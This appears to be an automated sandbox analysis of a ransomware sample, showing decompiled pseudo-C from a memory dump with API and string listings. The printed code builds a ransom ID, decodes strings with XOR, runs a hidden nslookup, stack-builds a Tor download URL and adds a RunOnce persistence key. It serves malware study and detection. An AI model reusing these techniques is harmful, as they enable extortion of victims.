					_t102 = 0xf9e2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}























































                                        0x0f9d40f5
                                        0x0f9d43c8
                                        0x0f9d43cd
                                        0x0f9d43cd
                                        0x0f9d40fb
                                        0x0f9d40fc
                                        0x0f9d40fe
                                        0x0f9d40ff
                                        0x0f9d4104
                                        0x0f9d4106
                                        0x0f9d4107
                                        0x0f9d4109
                                        0x0f9d410a
                                        0x0f9d410c
                                        0x0f9d410d
                                        0x0f9d410f
                                        0x0f9d4110
                                        0x0f9d4115
                                        0x0f9d4117
                                        0x0f9d4118
                                        0x0f9d4121
                                        0x0f9d412d
                                        0x0f9d413e
                                        0x0f9d4147
                                        0x0f9d4151
                                        0x0f9d4157
                                        0x0f9d4160
                                        0x0f9d4171
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d417b
                                        0x0f9d4187
                                        0x0f9d4193
                                        0x0f9d4199
                                        0x0f9d41a1
                                        0x0f9d41a6
                                        0x0f9d41ab
                                        0x0f9d41ae
                                        0x0f9d41b3
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c3
                                        0x0f9d41c8
                                        0x0f9d41cc
                                        0x0f9d41d1
                                        0x0f9d41d1
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x00000000
                                        0x0f9d43c3
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4271
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4193
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction ID: c7647e25ff9f3e2b9cd667db2ca99cf6af73a741ddd84f731f6c9557aa171e64
                                        • Opcode Fuzzy Hash: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction Fuzzy Hash: FB71E270508340DBE730DF14C909B6ABBEAFB80759F60891CF6855B2D2DBF99548CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120pipememoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xf9e2a70, 0xf9e2a6c,  &_v136, 0);
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xf9e2a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf9e2a68, 0xf9e2a74,  &_v136, 0);
						_t45 = SetHandleInformation( *0xf9e2a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0F9D4C40(_t66);
								E0F9D4DE0(_t57, _t64, _t57, _t64, _t66);
								VirtualFree(_t66, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}









































                                        0x0f9d4e9d
                                        0x0f9d4ea8
                                        0x0f9d4eab
                                        0x0f9d4eaf
                                        0x0f9d4eb1
                                        0x0f9d4ebb
                                        0x0f9d4ec2
                                        0x0f9d4ec5
                                        0x0f9d4ece
                                        0x0f9d4ee2
                                        0x0f9d4ee9
                                        0x0f9d4ef0
                                        0x0f9d4ef7
                                        0x0f9d4efe
                                        0x0f9d4f05
                                        0x0f9d4f0c
                                        0x0f9d4f13
                                        0x0f9d4f1a
                                        0x0f9d4f21
                                        0x0f9d4f28
                                        0x0f9d4f2f
                                        0x0f9d4f36
                                        0x0f9d4f3d
                                        0x0f9d4f44
                                        0x0f9d4f4b
                                        0x0f9d4f52
                                        0x0f9d4f59
                                        0x0f9d4f60
                                        0x0f9d4f67
                                        0x0f9d4f6e
                                        0x0f9d4f75
                                        0x0f9d4f7c
                                        0x0f9d4f83
                                        0x0f9d4f8a
                                        0x0f9d4f91
                                        0x0f9d4f9b
                                        0x0f9d4fa2
                                        0x0f9d4fa9
                                        0x0f9d4fb1
                                        0x0f9d4fcd
                                        0x0f9d4fd1
                                        0x00000000
                                        0x0f9d4fd3
                                        0x0f9d4fe6
                                        0x0f9d4ff6
                                        0x0f9d4ffa
                                        0x00000000
                                        0x0f9d4ffc
                                        0x0f9d5010
                                        0x0f9d5014
                                        0x0f9d5051
                                        0x0f9d505f
                                        0x0f9d5016
                                        0x0f9d501b
                                        0x0f9d5026
                                        0x0f9d502f
                                        0x0f9d503c
                                        0x0f9d504a
                                        0x0f9d504a
                                        0x0f9d5014
                                        0x0f9d4ffa
                                        0x0f9d4fb3
                                        0x0f9d4fb3
                                        0x0f9d4fbc
                                        0x0f9d4fbc

                                        APIs
                                        • CreatePipe.KERNEL32(0F9E2A70,0F9E2A6C,?,00000000,00000001,00000001,00000000), ref: 0F9D4FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FCD
                                        • CreatePipe.KERNEL32(0F9E2A68,0F9E2A74,0000000C,00000000), ref: 0F9D4FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F9D500A
                                        • wsprintfW.USER32 ref: 0F9D501B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction ID: 163e21a783c1a5fa8a35e4008c080839245fdbe60ce28d39c22a4fc74c2d00d9
                                        • Opcode Fuzzy Hash: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction Fuzzy Hash: 22418270E053189BEB20CF95E8487EDBFB5FB04755F208129E504AB292C7F905988F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D41D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104stringmemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf9e2000) =  *(_t41 + 0xf9e2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf9e2a64 = 0xf9e2000;
				_t60 = E0F9D8090(0xf9e2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf9e2000;
						_t49 =  *0xf9e2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf9e2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf9e2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xf9e2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0F9D7C10( &_a136);
				return _t44;
			}














                                        0x0f9d41d6
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4264
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x00000000
                                        0x0f9d4262
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x0f9d4210
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x0f9d43cd

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D4385
                                        • wsprintfW.USER32 ref: 0F9D439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D43B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction ID: bdef4670d4e6e9611c6fe0d843e6577e2dde8ef92e158d646d22250ee7fdf2a4
                                        • Opcode Fuzzy Hash: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction Fuzzy Hash: 57419C70508341CBE720DF14C54876ABFE6FB81799F64891CF6880B292D7FA8599CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87registrystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E0F9D2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F9D8150( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}




































                                        0x0f9d296b
                                        0x0f9d296d
                                        0x0f9d2979
                                        0x0f9d2980
                                        0x0f9d2984
                                        0x0f9d298c
                                        0x0f9d2993
                                        0x0f9d299a
                                        0x0f9d29a8
                                        0x0f9d29b0
                                        0x0f9d29bd
                                        0x0f9d29c7
                                        0x0f9d29ce
                                        0x0f9d29eb
                                        0x0f9d29f8
                                        0x0f9d29ff
                                        0x0f9d2a06
                                        0x0f9d2a0d
                                        0x0f9d2a14
                                        0x0f9d2a1b
                                        0x0f9d2a22
                                        0x0f9d2a29
                                        0x0f9d2a30
                                        0x0f9d2a37
                                        0x0f9d2a3e
                                        0x0f9d2a45
                                        0x0f9d2a4c
                                        0x0f9d2a53
                                        0x0f9d2a5a
                                        0x0f9d2a61
                                        0x0f9d2a68
                                        0x0f9d2a6f
                                        0x0f9d2a76
                                        0x0f9d2a7d
                                        0x0f9d2a8c
                                        0x0f9d2ac7
                                        0x0f9d2a8e
                                        0x0f9d2aa4
                                        0x0f9d2aaf
                                        0x0f9d2ab1
                                        0x0f9d2ab7
                                        0x0f9d2abf
                                        0x0f9d2abf

                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0F9D299D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F9D2C45,00000000), ref: 0F9D2A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D2A8F
                                        • RegSetValueExW.ADVAPI32(0F9D2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F9D2AA4
                                        • RegCloseKey.ADVAPI32(0F9D2C45), ref: 0F9D2AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
